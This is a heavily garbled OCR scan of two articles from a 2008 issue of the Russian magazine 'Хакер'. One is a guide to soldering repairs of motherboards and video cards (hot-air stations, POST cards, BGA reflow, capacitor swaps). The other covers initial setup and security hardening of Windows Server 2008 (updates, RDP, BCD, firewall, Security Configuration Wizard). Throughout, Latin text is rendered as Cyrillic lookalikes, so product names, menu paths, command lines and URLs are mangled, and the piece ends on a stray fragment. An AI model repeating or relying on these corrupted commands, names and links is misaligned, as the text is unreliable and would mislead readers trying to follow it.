8МБ (8игГасе Моипі Беѵісе) — в дословном переводе «устройс- 
тва, монтируемые на поверхность». Аббревиатурой обознача- 
ют безвыводные и часто безкорпусные компоненты, припаива- 
емые непосредственно к токопроводящим дорожкам печатной 
платы. Этим достигается большая плотность размещения 
деталей и уменьшается их взаимное влияние. Также подобный 
способ монтажа обеспечивает большую технологичность и 
делает конструкцию более приспособленной для роботизиро- 
ванного монтажа. 



ненное устройство, используемое для работы с ЗМй- компо- 
нентами, — термовоздушная паяльная станция, в простона- 
родье «термофен». Наиболее массовые паяльные станции 
продаются под труднопроизносимыми брендами Еикеу, 
Аоуие, Зипкко и прочими. Присутствуют в мастерских, ко- 
нечно, и более именитые ѴѴеІІег или Егза, но — куда реже. 
Принципом работы термовоздушные паяльные станции 
весьма схожи с обычным бытовым феном для сушки волос 

— воздух продувается сквозь нагревательный элемент, про- 
греваясь до нужной температуры. 

Некоторые паяльные станции вообще можно считать универ- 
сальными. Крометермофена они могутиметь в своем составе 
и обычный паяльник небольшой мощности, а иногда и БП с 
регулируемым напряжением. Паяльниктаких «универсалов» 
почти идеально подходит для мелкого ремонта компьютерных 
железок начинающими некромантами. 

Для пайки массивных компонентов (разъемы, чипсет, бРИ ви- 
деокарт) силенокодного термофена можетбыть маловато. На 
помощь приходят рабочие платформы с функцией подогрева. 
Грубо говоря, подогреватель — это понтовая электроплитка за 
130 баксов :). Отличие от бытовых собратьев в деталях — точ- 
ности поддержания температуры и равномерности нагрева. 
Оченьудобны упомянутые платформы при ВОА-монтаже 

— как для восстановления шариков-контактов, так и для 
пайки чипов. 

Следует за метить, что при известном желании в качестве 
подогревателя можно использовать и электроплитку, и утюг :]. 
Самый популярный инструмент ремонтника — паяльник. 
Подойдет практически любой, естественно, за исключением 
монстров, больше пригодных для лужения тазиков. Здесь 
главное — размер правильный подобрать. Мощность — от 1 5 
до 70 Ватт. Способ заточки жала принципиального значения 
не имеет. По моему опыту, для работы с компонентами неболь- 
шого размера удобна заточка «под конус». 

Если нет возможности использоватьтермофен, а паять мел- 
кие ЗМй-компоненты надо часто, будет разумно обзавестись 
несколькими паяльниками с пропилами вжалах, равными 
длине популярных компонентов (обычно это резисторы и 
конденсаторы). Пропилы легко сделать с помощью надфиля 
или верного друга моддера — дремеля. 

г Р05ТИМСЯ 

Когда ты ковыряешь хладный комповыйтруп.то причина 
смерти, как правило, ищется наобум. Но видел литы врача, 
который полагается исключительно на свою интуицию 
(о докторе Лекторе умолч им)? Думаю, таковых сейчас не 
встретишь. Как минимум, измеряется пульс и температура. 
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Последствия подхода «А может в этом слоте заработает?». В первом слоте был установлен работоспособный модуль памяти, во второй пихнули паленый. 
Не добившись результата, решили переставить в следующий 




Раскрошенная резисторная сборка цепейтерминации сигнальныхлиний 
памяти. На грани разъема — след, обозначающийтраекторию отвертки 



В болеетяжелых случаях применяется кардиомонитор и прочее. А чем мы 
не врачи? Ведь ВІ05 практически любого компьютера имеет встроенные 
процедуры, позволяющие узнать, на каком этапе произошел сбой или что в 
данный момент делаетсистема. 

Владельцы некоторых материнок производства ЕРОХ или АЬіІ знакомы с 
подобной системой диагностики. Да, речь идетоб индикаторах Р05Т-ко- 
дов, проще говоря, РОЗТ-картах. 

Наиболее доступной и в то же время функциональной РОЗТ-картой на 
территории СНГ является МастерКитА9221 . 

Заметно более функциональна, но и более дорогая — ІС Воок ІС80. Она, в 
отличие от А9221 , работает практически со всеми материнскими платами 
— от откровенно раритетных до самых современных. Ата кже позволяет 
пошагово отображать РОВТ-коды, показывает состояние смежных портов, 
корректно видится в РСІ-пространстве. 

г ВСЯ СИЛА В ШАРАХ! 

Взгляни на любую материнку. Или на видеокарту. Что бросается в глаза? 
Да, именно они — один или два чипа, в случае материнской платы гордо 



именуемых чипсетом и видеочипом — если в руках видюха. Атеперь 
присмотрись, каким способом они припаяны ктекстолиту платы? Выводов 
кактаковых не сильно-то и видно. Можно различить немалое количес- 
тво шариков, соединяющих чип с платой. Если называть вещи своими 
именами, то способ монтажа микросхем подобного типа зовется В6А. 

Сия аббревиатура является сокращением от Ваіі бгісі Аггау. В вольном 
переводе это звучит, как«решеткоподобный массив шариков» (выводами 
В6А-микросхем являются шарики из припоя]. 

В6А-пайка — это тема отдельной и весьма нудной статьи. Нам же нужно 
знать, что в случае деформации платы (толи перегрелась, то ли пере- 
усердствовали при сборке] возможен отрыв шариков отсвоих контактных 
площадок на плате. В жаргоне существуеттермин «отвал» (моста или 
6РІІ]. При известном везении ликвидировать последствия отвала можно, 
прогрев плату с обратной стороны до температуры плавления припоя. 
Предварительно под мосте помощью шприца вливается флюс. 

г ПЕРЕХОДИМ К ДЕЛУ 

Самый сложный этап пройден — неисправность обнаружена. Осталось 
дело за «малым» — взять паяльник в руки и попытаться исправить то, 
что, по твоему мнению, является причиной неисправности. Перед тем, 
какты окончательно угробишь дорогущую видеокарту или материнскую 
плату премиум-класса, я бы посоветовал предпринять более консер- 
вативные шаги. К примеру — перешить ВІ05 каксистемной платы, так 
и видеокарты. Возможно, проблема в них. Неплохо было бы прове- 
рить остальные железки. Вдругвидюха, застывшая под занесенным 
паяльником нивчемне виновата, а причина всему — переразогнанный 
процессор. 

Если же желание паять и крушить непреодолимо, то есть последняя 
перестраховка — сфотографировать «жертву». Нет, не для надгробного 
камня. Послетого, какты снимешь десяток-второй деталюшек 
с платы, увлекшись пайкой, информация отом, что и где 
стояло, приобретает особую ценность. 

И если уж разговор зашел о пайке — для начала 
потренируйся на каком-то хладном трупе. К 
примеру, старенькой видеокарте или безвре- 
менно почившей доисторической материнке. 

Ведь потерь никаких, а руку набить — всегда 
полезно. 

Если по итогам осмотра были обнаружены 
снесенные компоненты или порванные дорож- 




ХАКЕР 06 /114/ 08 











рЬгеакіпд 



Ригмік-д Ымоп 



Набор инструмента продвинутого ковыряльщика железок. По порядку: 1 — 
онд, совмещенный с металлической щеточкой, 2 — скальпель, 3 — угловой 
Мй-пинцет, 4 — прямой 5М 0-пинцет, 5 — 5М 0-пинцет с 



"ипичные последствия включения платы с не до конца установленным 
модулем памяти. Примернотакой же виду платы будет при установке 
памяти «задом наперед». Цифрами обозначены: 1 — подгоревший контакт, 
2 — транзистор стабилизатора питания памяти, 3 — диод в цепи питания 



Рабочая платформа с функцией подогрева Аоуие ІПІ853А 



Одна из самых популярныхтермовоздушных паяльных станций — І_икеу 
8520+ 



ки, то берем паяльник в руки и ищем замену. Золотое правило — сперва 
найди и выпаяй «донорский орган», а потом уж берись за пациента. 
Вполне может быть, что после часовой возни с крошечными деталями 
придется пройтись, подышать воздухом. 

Для многих людей характерна недостаточная точность движений (траб- 
лы с микромоторикой). Если ты изтаких, я бы посоветовал не искушать 
судьбу, а нанести визитзнакомым ремонтникам мобильников. Что, нету? 
Значит, пора заводить знакомства. 

Восстанавливать порванные или прогоревшие дорожки можно с по- 
мощью тонкого провода. Идеально для этого подходят одиночные жилки 
из провода МГТФ. По окончанию монтажа их следует зафиксировать 
цапон-лаком или клеем. 

Для пайки удобнее всего использовать термофен с соответствующей 
насадкой. Он же окажется незаменимым для замены более крупных 
деталей — аудиокодеков, мелкой логики и даже чипов ЗирегІО. 

В случае массового «залета» электролитических конденсаторов при- 
дется топать в магазин радиодеталей — ставить бывшие в употреблении 
конденсаторы я бы не советовал. При покупке надо оговорить, что кон- 
денсаторы нужны І_оѵѵ Е5Р. Рабочее напряжение не должно быть ниже 
того, на которое были рассчитаны штатные. Емкость может быть немного 
больше штатной. Да, и не забывай о габаритах — городить висячие сады 
Семирамиды из гроздей конденсаторов сейчас немодно. 

Для демонтажа конденсаторов используй паяльник мощностью около 
80Вт с жалом шириной чуть больше, чем расстояние между выводами. 

В роли флюса пригодится сосновая канифоль — в ней весь секрет. Дело 
втом, что канифоль имеет неплохую теплопроводность, что позволяет 



прогреть не только выводы, но и плату. Процедура выглядит пример- 
нотак: плату держим между колен, стыльной стороны греем выводы 
конденсатора. Свободной рукой, покачивая, извлекаем конденсатор. 

Не прочищая от припоя монтажные отверстия, сразу же вставляем в 
них новый конденсатор. Немного попрактиковавшись, можно менять 
конденсаторы с качеством, не отличимым отзаводского. 

Для замены мощныхтранзисторов (МОЗ^еі) удобнее всего использовать 
тотже термофен. Подскажу маленькую хитрость — окружающие компо- 
ненты лучше укрыть от потока горячего воздуха или пищевой фольгой, 
или (предпочтительнее) с помощью металлизированного скотча (его 
используют для ремонта вентиляционных каналов, паропроводов в 
саунах и пр.). 

Если нужного паяльного оборудования нету в радиусе семи дней на собаках 
— пользуемся принципом «Голь на выдумки хитра». К примеру, вместо 
термофена можно использовать газовую горелку или даже пьезозажигалку. 
Мнеудавалосьменятьчипы на модулях памяти таким способом. В качестве 
подогревателя при пайке массивных деталей подойдетобычный утюг, 
зафиксированный вверх подошвой. Тонкие пинцеты можно «одолжить» у 
знакомого стоматолога, скальпель — отобратьу маньяка вечером в парке. 

г ИТОГ 

Дочитав мои разглагольствования до этой строчки, ты, наверное, заме- 
тишь, что больно поверхностно все описано. Ничего удивительного — я и 
не ставил себе цель за одну статью сделать из тебя компьютерного мага- 
некроманта. Но еслиты решишь действовать, то я свою задачу выполнил. 
Ведь главное — желание и прямые руки. Остальное — приложится! ц-ц 
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>> ХАКЕР. РКО 




Берем Ьсжснокы 

за РОГА 



ѴѴІЫБОѴѴБ 2008 5ЕКѴЕК: ПЕРВОНАЧАЛЬНЫЕ НАСТРОЙКИ И БЕЗОПАСНОСТЬ 



Установка ѴѴіп2к8 довольно проста, и если все требования к оборудова- 
нию и размещению выдержаны, через 20 минут мы получаем уже готовую 
к использованию систему. Далее предстоит выполнить первоначальные 
настройки, произвести установку ролей и уделить пристальное внимание 
повышению уровня защиты сервера. С этими вопросами и разберемся. 



ПОСЛЕ УСТАНОВКИ 

Сервер ѴѴіп2к8 может быть установлен в двух режимах: Риіі с графическим 
интерфейсом и Зегѵег Соге, в котором настройки производятся при помощи 
командной строки. Второй вариант трогать пока не будем. 

Хочу обратить внимание на то, что на сайте Місгозой: доступен пакет много- 
язычного интерфейса пользователя для Ѵ\Йп2к8, при помощи которого мож- 
но локализовать систему. Пакеты разбиты по группам, русский находится в 
третьей из них. Для установки пакета локализации необходимо пересобрать 
образ, используя ѴѴіпсІоѵѵз АіПотаГесІ ІпЩаИагіоп Кк (ѴѴАІК) . Интересно, 
почему нельзя было просто выложить тзі-файл? 

После регистрации в системе тебя встретит Іпігіаі Сопй^игагіопз Тазкз и 
предложит выполнить первые шаги по настройке сервера. Перед тем как 
бросаться в бой, советую сначала сделать более удобным рабочее окружение. 
Для этого проходим по маршруту: 8іаП: -> СопНоІ Рапеі -> Арреагапсе апсі 
Регзопа1І2агіоп -> Регзопаіігагіоп. Здесь есть несколько пунктов, назначение 
которых совпадает со «Свойства Экрана» из более ранних версий. Все вклад- 



ки разбиты по отдельным меню, но принцип настроек остался прежним. 
Обязательно перейди в Пеѵісе Мапа§ег и убедись, что все оборудова- 
ние определено и работает правильно (напротив списка устройств 
нет восклицательных или вопросительных знаков) . Если это не 
так, пробуем получить нужные драйвера на сайте производителя 
вручную или автоматически — воспользовавшись кнопкой КеіпзИаІІ 
Пгіѵег. 

Теперь можно возвращаться в ІпМаІ Сопй&игайопз Тазкз. В предыдущей вер- 
сии сервера большинство доступных здесь параметров настраивалось на этапе 
установки системы — нынче они собраны в одном месте, что очень удобно. 
Выбираем Зеі: Шпе гопе, устанавливаем часовой пояс и при необходимости 
корректируем системное время — для сервера это важно. По умолчанию 
автоматическая синхронизация времени включена и в качестве ЫТР-сервера 
выбран йте.уѵіпйоѵѵз.сот . Если ты предпочитаешь использовать другой 
сервер, просто введи его данные во вкладке Іпіетеі: Тіте ЗеШп§ и нажми 
«Ирсіаііе поѵѵ». Настройки нового сервера будут запомнены на автомате. 
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В Регзопаіігаііоп настраиваем параметры рабочего стола 



Далее настраиваем сетевое подключение. Нажимаем «Сопгі&иге 
№і\ѵогкіп§». В появившемся окне ИеГѵѵогк Соппесйопз должны 
быть отображены все найденные сетевые интерфейсы. В ѴѴіп2к8 
по умолчанию устанавливаются: клиент для сетей Місгозоіт, 
доступ к файлам и принтерам, планировщик (^оЗ, поддержка 
ІРѵ4 и ІРѵб, Ьіпк-Ьауег Торо1о§у Оізсоѵегу Маррег І/О Эгіѵег 
и Ьіпк-Ьауег Торо1о§у Оізсоѵегу Кезропбег. ІР-адрес сетевому 
интерфейсу назначается динамически. Таких настроек хватит 
в большинстве ситуаций. Выбрав любой из пунктов, можно его 
изменить, например, задать статический ІР-адрес для ІРѵ4. Если 
не используется шестая версия протокола, его лучше отключить, 
сняв соответствующий флажок. Некоторые роли, вроде Эотаіп 
Сопітоііег, НИЗ и ЭНСР Зегѵег, требуют статического адреса, а по 
умолчанию в ѴѴіп2к8 используется именно ІРѵб. 

Переходим к Ргоѵібе сотршег пате апб ботаіп, где указываем 
имя компьютера, и подключаемся к домену или рабочей груп- 
пе. После изменения этих параметров потребуется перезагрузка. 
Смело можно переходить к следующему полю НрсіаНе ТЫз 
Зегѵег. Выбираем ЕпаЫе Аиіотаііс ИрбаГт^ апб РеебЪаски в 
появившемся окне указываем автоматическую или ручную 
настройку получения обновлений и отправку в МісгозоЙ 
информации об ошибках и СЕІР. Если тебя интересуют не все 
пункты, тогда выбирай Мапиаііу сопЯ&иге ЗеШп§ и активируй 
то, что нужно: 

• Аиіотагіс ІІрбаіез — автоматическое обновление, по 
умолчанию отключено; выбрав СЬап§е Зеиіп§, можно указать 
расписание обновления, отдельно разрешается загрузка реко- 
мендованных обновлений. В больших средах ддя обновления 
удобнее использовать ѴѴЗІІЗ или Зузіет Сепіег Орегаііопз 
Мапа§ег2007; 

• ѴѴіпсІоѵѵз Еггог Кероггіп^ — в установке по умолчанию 
администратор получает при сбое запрос на отправку диагнос- 
тической информации в МісгозоЙ. Здесь можно установить 
автоматическую отправку детальных отчетов или отключить 
этувозможность. 

• Сизіотег Ехрегіепсе Ітргоѵетепі Рго§гат — программа 
СЕІР предназначена для сбора анонимной информации о 
характеристиках и общих задачах, выполняемых пользователя- 
ми, и проблемах, с которыми они столкнулись. По дефолту она 
отключена; если не доверяешь, просто оставь, как есть. 

По умолчанию в Аиіотагіс ІІрбаіез не активен ни один из имею- 
щихся там пунктов. В любом случае необходимо определиться 
с политикой обновления и указать ее. Если планируется только 
ручное обновление (весьма нежелательно), то отметь Иеѵег 
сЬеск (от Ирсіаіез, иначе соответствующая ссылка в Эоѵѵпіоаб 
апб Іпзіаіі Ирсіаіез, при помощи которой производится обновле- 
ние системы вручную, будет неактивна. О наличии обновлений 
будет предупреждать апплет в панели задач. Рекомендуется 



«накатывать» последние обновления каждый раз перед добав- 
лением роли или установкой компонента (Реаіиге) . 

Как и в предыдущих версиях, кѴѴіп2к8 можно подключаться 
удаленно, используя ИЗР. Если есть такая необходимость, захо- 
дим в ЕпаЫе Кетоіе Эезкіор. Здесь можно выбрать один из трех 
параметров подключения. Самым защищенным — и потому 
рекомендуемым — является АІІоѵ? Соппесііопз опіу Игот 
сотриіегз гиппіпд Кетоіе Безкіор ѵ/ііЪ. Ыеімогк 
Ьеѵеі АиіЬепіісаІіоп. Нажав кнопку Зеіесі Изегз, добав- 
ляем учетные записи пользователей, которым разрешено 
подключаться к серверу посредством Кетоіе Эезкіор. 

НОВЫЙ МЕХАНИЗМ ЗАГРУЗКИ 

Все операционные системы, построенные на ядре ІМТ, исполь- 
зовали в качестве загрузчика ИТ Іюасіег (ІЧТШК) с конфи- 
гурационным файлом Ъооі . іпі. Начиная с ѴѴіпсіоѵѵз Ѵізіа, 
порядок загрузки операционной системы изменен. В Ѵізіа и 
ѴѴіп2к8 используется механизм, получивший название Вооі 
Сопгі§игаііоп Эаіа (ВСЭ) . В загрузочном секторе содержится 
информация о расположении файла системного загрузчика 
Ьоогіп^г (ѴѴіпсІоѵѵз Вооі Мапа§ег) . Причем, Місгозоіі: усложнила 
жизнь пользователям, так как отныне все настройки хранятся в 
файле бинарного формата. Настройки ВСЭ загружаются в вет- 
ку реестра НКЬМ \ ВС И 0 0000000, поэтому формат файла похож 
на реестр, но отредактировать его вручную, просто открыв в 
Блокноте, уже нельзя. Кроме того, отсутствует соответствую- 
щая ссылка из меню Зіагіир апб Кесоѵегу («Загрузка и Восста- 
новление») . Теперь здесь находятся параметры, позволяющие 
изменить систему, загружаемую по умолчанию, и установить 
задержку перед загрузкой. Для систем, стартующих через ВІ08 
(а не через ЕРІ), настройки хранятся в скрытом каталоге \Вооі\ 
ВСО, который расположен на системном томе. Этот файл может 
быть изменен при помощи специальной утилиты ( \ Шпсіоыз \ 
зуз I етЗ 2 \ Ьсгіегіі I . ехе) . Как вариант, предлагается исполь- 
зовать ѴѴМІ (ѴѴіпс1о\ѵ5 Мапа^етепі Іпзігитепіаііоп) . Боль- 
шинство пользователей вряд ли сочтут их удобными, но после 
выхода Ѵізіа появились решения, обладающие интуитивно 
понятным графическим интерфейсом. Например, бесплатные 
ѴізіаВооіРКО ГѵѵллАѵ.ѵізіаЬооірго.ог^) или ЕазуВСЭ Гпеозтагі. 
пеі/с!1.р1ір?ісі=1) . 

НАСТРОЙКА ѴѴІЫ00ѴѴ5 РІКЕШАИ 

После установки ѴѴіпсІоѵѵз Рігеѵѵаіі (ѴѴіпсІоѵѵз Рігеѵѵаіі ѵгііЬ. 
Абѵапсесі Зесигііу или ѴѴРАЗ) активирован и содержит правила 
для фильтрации входящих и исходящих соединений. По умолча- 
нию все исходящие соединения разрешены. В ѴѴРАЗ можно 
создавать правила для учетных записей, групп АО, сетевых 
интерфейсов, служб сервера, протокола ІСМР. Поддерживает- 
ся и ІРѵб. Основные настройки ѴѴРАЗ производятся из Зегѵег 
Мапа§ег или из одноименного пункта в Абтіпізігагіѵе Тооіз. 

Из Іпіііаі Сопгі^игаііопз Тазкз можно вызвать лишь базовые 
настройки, похожие на те, которые появились в ѴѴіпХР. Хотя 
есть и отличия. После установки новой роли все соединения, 
скорее всего, будут заблокированы. Если нет необходимости 
в запуске мастера настройки безопасности (о нем речь ниже), 
лучшим выходом будет установка исключений (Ехсергіопз), ко- 
торая производится в одноименной вкладке. Нажав кнопку АсЫ 
Рго§гат или Абсі РогІ, добавляем в этот список исполняемый 
файл или порт, для которого будет установлено исключение. 
Нажав кнопку СЬап§е Зсоре в окне настройки порта, допол- 
нительно можно указать локальный и удаленный ІР-адрес 
или сеть (более тонкая настройка) . Очень полезно получать 
уведомления о новых программах, заблокированных ѴѴіпсІоѵѵз 
Рігеѵѵаіі. Для этого следует установить флажок «ІѴо Іііу те 
мЬеп Міпсіоѵ/з Рігеѵіаіі Ыоск а пеѵ/ ргодгат». 




> ІГб<Э 

•Чтобы локализовать 
интерфейс, нужно 
установить пакет 
многоязычного интер- 
фейса пользователя 
для ѴѴіп2к8, который 
можно свободно 
скачать с сайта корпо- 
рации (доступен для 
платформ х86 и х64; 
для Ііапіит пока нет 
поддержки великого и 
могучего). 

•Конфигурацион- 
ный файл загруз- 
чика ѴѴі п2к8 можно 
отредактировать 
при помощи утилиты 
Ъссіесіі I . ехе или 
более интуитивно по- 
нятных ѴізіаВооіРКО 
( ѵѵѵѵѵѵ.ѵізІаЬооІрго.огд ). 
а также - ЕазуВСй 
( пеозтагі.пеі/ 
сІІ.рЬр?іс1=1 ). 

• Не забудь настроить 
параметры управле- 
ния питанием в Сопігоі 
Рапеі ^ Роѵѵег Орііопз. 

•Процедура загрузки 
сервера с ѴѴіп2к8: 

Віоз Мазіег Вооі 
Ресогсі -> Вооі Зесіог 
^ѴѴіпсІоѵѵз Вооі 
Мападег Чтение 
из ВСй Поиск 
файла гибернации 
Загрузка ѵѵіпіоасі.ехе 
Загрузка піозкгпі.ехе 
Загрузка зтзз.ехе -> 
Загрузка ѵѵіпіодоп.ехе 
Загрузка служб 
Вход в систему (І_одіп 
іпіегіасе). 
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>> ХАКЕРРКО 




Проверка найденного оборудования в йеѵісе Мападег 





> 1іпк5 

В статье не затронуты 
групповые политики 
и новый инструмент 
СРОАссеІегаІог, поз- 
воляющий настроить 
6Р0 в соответствии 
с рекомендациями 
ѴѴіпсІоѵѵв Зегѵег 
2008 Зесигііу Оиісіе: 
ІесІіпектісговоЙ. 
сот/еп-из/ІіЬга гу/ 
сс264463.аврх . 




> ѵѵагпіпд 

Рекомендуется на- 
катывать последние 
обновления всякий 
раз перед добавле- 
нием роли или уста- 
новкой компонента. 



Новая консоль ММС-управления настройками ѴѴРАЗ объеди- 
нена с интерфейсом настройки ІпГегпеГ РгоГосоІ Зесигііу (ІРЗес) 
и обрела новые функции. Изменился и принцип настройки. 
Например, на смену двум профилям Оотаіп и ЗГапбагб, доступ- 
ным в ѴѴіп2кЗ, пришли Оотаіп, РгіѵаГе и РиЫіс. Назначение 
первого осталось неизменным (он используется при подключе- 
нии к домену) . Профили РгіѵаГе и РиЫіс используются в осталь- 
ных случаях, но если раньше вариант работы брандмауэра был 
один, теперь можно выбирать разные настройки в зависимости 
от защищенности сети. По умолчанию используется более стро- 
гий РиЫіс. Изменить назначение сети можно, выбрав в Сопітоі 
Рапеі пункт ИеГѵѵогк апб Зііагіп§ СепГег. Нажимаем «СизГотіге» 
и выбираем новый профиль. В поле Зкагіпд апб Оізсоѵегу допол- 
нительно настраиваются параметры видимости компьютера в 
сети. Новые правила создаются при помощи вполне понятного 
пошагового мастера. 

Для управления настройками ѴѴРАЗ из командной строки 
используй команду «п еѣзЪ. а сіѵШ гема 11». 

МАСТЕР НАСТРОЙКИ БЕЗОПАСНОСТИ 

Настройка безопасной работы сервера — дело непростое. 
Обилие функций может сыграть злую шутку и привести к ос- 
лаблению безопасности. Так, по умолчанию в ѴѴіп2к8 имеется 
чуть более 100 служб, почти половина из них запускается авто- 
матически. Вместе с пакетом 5Р1 для ѴѴіп2кЗ администраторы 
получили весьма полезный инструмент «Мастер настройки 
безопасности» (ЗСѴѴ — Зесигііу Сопіі^игагіоп ѴѴігагсІ) . На осно- 
ве анализа системных настроек зесесЗп предлагал отключить 
неиспользуемые службы и способствовал безопасной настрой- 
ке основных сервисов, позволяя уменьшить количество потен- 
циальных объектов для атак. В новой версии сервера «Мастер» 
существенно переработан и расширены его возможности (за 
счет новых ролей и интеграции с ѴѴРАЗ) . 

Доступна новая концепция ролей и компонентов, при которой 
после установки сервер практически «голый». Все, что необ- 
ходимо, развертывается самим администратором в нужных 
дозах, а «Мастер установки ролей и компонентов» добавляет 
только самое необходимое, попутно настраивая другие 
компоненты на совместную работу с новой ролью (например, 
перестраивая правила брандмауэра) . В таких условиях ЗСѴѴ, 
вероятно, уже не играет такой ключевой роли для обеспече- 
ния безопасности, как в ѴѴіп2кЗ. Но все же, его использование 
поможет поднять уровень безопасности сервера. Кроме того, 
запустив ЗСѴѴ, можно узнать больше о настройках сервера и 
отношениях между компонентами. С его помощью создаются 
настройки, которые будут поддерживать только выбранные 
роли, тем более что возможность отключения ненужных серви- 



сов и настройка дополнительных параметров безопасности ос- 
тались. Также при помощи ЗСѴѴ можно увеличить безопасность 
при использовании нестандартной роли. Поэтому после того, 
как на сервере будут установлены все планируемые роли и ком- 
поненты, весьма желателен запуск мастера ЗСѴѴ. Совместимые 
программы сторонних производителей, которые самостоятель- 
но устанавливают политики для ЗСѴѴ, интегрируются в сервер 
без проблем. Дія несовместимых программ политики придется 
настраивать вручную. 

ПРИСТУПАЕМ К НАСТРОЙКАМ 

Мастер ЗСѴѴ можно вызвать из окна Зегѵег Мападег или — 
выбрав одноименную ссылку в Асітіпізйгайѵе Тооіз. Работа 
мастера разделена на несколько этапов. 

Сначала предстоит выбрать, будем ли создавать новую или 
редактировать уже имеющуюся политику, применять готовую 
или делать откат. В некоторых случаях предстоит указать на 
ХМЬ-файл, в котором сохранены настройки. Возможность при- 
менения уже готовых политик на других компьютерах заметно 
упрощает настройку. В случае установки на несколько систем 
следует определиться с прототипом, а затем, создав политику, 
применить ее и к остальным (изменив при необходимости) . 

Во втором окне «Мастера» содержится общая информация о 
назначении ЗСѴѴ и рекомендации по настройкам (например, 
в случае, если в ѴѴіпсІоѵѵз Рігеѵѵаіі открыт порт для входящих 
подключений) . Выбираем компьютер, который будет служить 
прототипом. Для подключения кудаленной системе необходи- 
мо обладать соответствующими правами. Затем проверяется 
текущее состояние системы, в частности, определяется список 
служб, ролей и компонентов. Полученная информация сверя- 
ется с внутренней базой, в которой содержатся данные о том, 
какие роли и компоненты используют порты, сервисы и другую 
информацию. Нажав кнопку ѴіеѵѵСопй&игагіош ОаіаЪазе, 
можно запустить ЗСѴѴ Ѵіеѵѵег и просмотреть текущий список 
ролей, компонентов, настройки ѴѴіпсІоѵѵз Рігеѵѵаіі, список сер- 
висов и прочее. Весьма ценная информация, помогающая еще 
лучше понять внутренний мир ѴѴіп2к8 ! 

Теперь, собственно, переходим к настройкам политик безопас- 
ности. Сначала последовательно отмечаем роли, компоненты 
и дополнительные оргіопз, которые выполняются на сервере. 
Под параметры (оргіопз) попадает все, что не вошло в первые 
две категории. Здесь присутствуют службы, инструменты 
администрирования и т.д. 

Несмотря на простоту выбора (флажок напротив нужного 
пункта) , это — очень важный этап. Если в ответах указать 
неверные данные, можно отключить нужную функцию или, на- 
оборот, активировать лишний сервис. Обрати внимание на то. 



► ііб 
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Редактирование настроек правила в ш 



что ЗСѴѴ показывает не только те роли, которые доступны в мастере добав- 
ления ролей, но и некоторые другие. Например, в списке 5СѴѴ отсутствуют 
роль сервера приложений (АррНсайоп Зегѵег) и четыре роли, относящиеся к 
АсПѵе МгесЮгу. Это связано с несколько иным алгоритмом работы 5СѴѴ, но, 
признаюсь, такой расклад при первом знакомстве сбивает с толкуй, чтобы 
не ошибиться в выборе, приходится обращаться к справочной информации 
и подсказкам мастера. Упрощает ситуацию то, что в показанном списке уже 
отмечены все нужные роли, которые нашел мастер при анализе конфигура- 
ции. Остается только проверить правильность выбора. В крайнем случае, 
всегда можно отменить все изменения. По умолчанию показаны роли, на 
которые может быть настроен сервер. Вариант Соге изначально поддержива- 
ет меньшее количество ролей, поэтому и перечень, выведенный здесь, будет 
меньше. В раскрывающемся списке Ѵіеѵѵ можно выбрать АН Коіез, активи- 
рующий показ всех ролей в базе данных, в том числе и не поддерживаемых 
сервером. Аналогичная ситуация и с компонентами: список, показанный 
мастером 5СѴѴ, не совпадает с Асісі РеаШгез ѴѴігагб. 

Выбираем, что делать со службами, которые фактически не удовлетворяют 
политике. По умолчанию предлагается не изменять режим запуска таких 
служб фо поі сЬап§е знати ир тюбе об пЬе зегѵісе) , более безопасным считается 
вариант их отключения (ЭізаЫе пЬе зегѵісе) . Если политики будут примене- 
ны на других серверах, конфигурация которых отличается, выбор второго 
варианта может привести к сбоям. Далее мастер выводит резюме, где пере- 
числяется список всех служб (АН зегѵісез) , а также тех, которые подпадают 
под применение политик (СЬап§еб зегѵісез) . Если какое-то действие требует- 
ся отменить, придется возвращаться к предыдущим шагам мастера. 

НАСТРОЙКИ СЕТИ И ПРИЛОЖЕНИЙ В 5СѴѴ 

Не менее важен и следующий этап — ИеНѵѵогк Зесигііу. И хотя его можно 
пропустить (как и следующие) , установив флажок Зкір нЫз зесНіоп, лучше все- 
таки пройтись по его пунктам. После страницы приветствия будет показан 
список правил настройки \Ѵіпбо\ѵз Рігеѵѵаіі, выполненный в соответствии 
с выбранными шаблонами. Если использовать раскрывающийся список, 
можно отобрать для просмотра правила, предлагаемые ЗСѴѴ для выбран- 
ных ранее ролей и компонентов. После этого шага все соединения к ролям, 
не попавшим в список, будут блокированы. Чтобы получить подробную 
информацию о конкретном правиле, нажимаем на значок треугольника. 
Выбрав правило и нажав кнопку Ебп, его можно отредактировать. Окно ЕсШ 
гиіе содержит четыре вкладки; большинство параметров заблокированы 
и изменять их нельзя. При помощи имеющихся настроек можно, напри- 
мер, разрешить только зашифрованные соединения, указать конкретный 
локальный и удаленный ІР-адрес, привязав к строго определенным узлам. В 
результате получаем список правил, настроенных под конкретный сервер. 

В следующей секции Ке^ізіту 5еШп§ настраивается несколько параметров 
реестра, определяющих политики на уровне приложений и протоколов. 




Настройка исключений в ѴѴіпсіоѵѵз Рігеѵѵаіі 



Например, можно предъявить 
требования к операционным 
системам, подключающимся к 
серверу, и разрешенные методы 
аутентификации для входящих и 
исходящих соединений. Перейдя 
в раздел Аибп Роіісу, выбери нуж- 
ный уровень аудита (отключен, 
аудит успешной или заблоки- 
рованной активности). Предла- 
гаемые параметры подходят для 
большинства случаев. Далее сохрани 

настройки в ХМБ-файл . При необходимости можно добавить к созданным 
политикам имеющиеся шаблоны безопасности, установив приоритет пра- 
вил. Определяемся, нужно ли применять созданные политики по окончании 
работы мастера — и все ! 

Также не мешает знать об утилите командной строки зсмстд . ехе, при 
помощи которой можно просмотреть, проанализировать, настроить создан- 
ные политики или произвести откат. Созданный ХМЬ-файл политик можно 
открыть в Блокноте, но разбираться с установками в таком виде неудобно. 
Чтобы просмотреть политики в 5СѴѴѴіе\ѵег, вводим «земств . ехе ѵі еы 
/х: іезі Иііе.хті ». Если использовать ключ йгапзбопп, можно преобра- 
зовать политику в объект групповой политики (СРО) . Но здесь следует быть 
очень осторожным. Например, в политике есть правила, ограничивающие 
работу по некоторому протоколу только с определенным ІР-адресом. Приме- 
нительно к другим компьютерам подобное правило может дать непредсказу- 
емый результат! 

ЗАКЛЮЧЕНИЕ 

В статье описаны лишь первые шаги, которые требуется сделать админист- 
ратору, чтобы настроить сервер и повысить его защищенность. Будь внима- 
телен: каждая установленная роль, каждый компонент имеют специфичес- 
кие настройки, влияющие на безопасность. Дальнейшие действия зависят от 
наличия и структуры доменной среды. □с 




Просмотр установоксервера при 
оаботе 5СѴѴ 
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Вооруженный 

БРОНЕКАЛЬМАР 



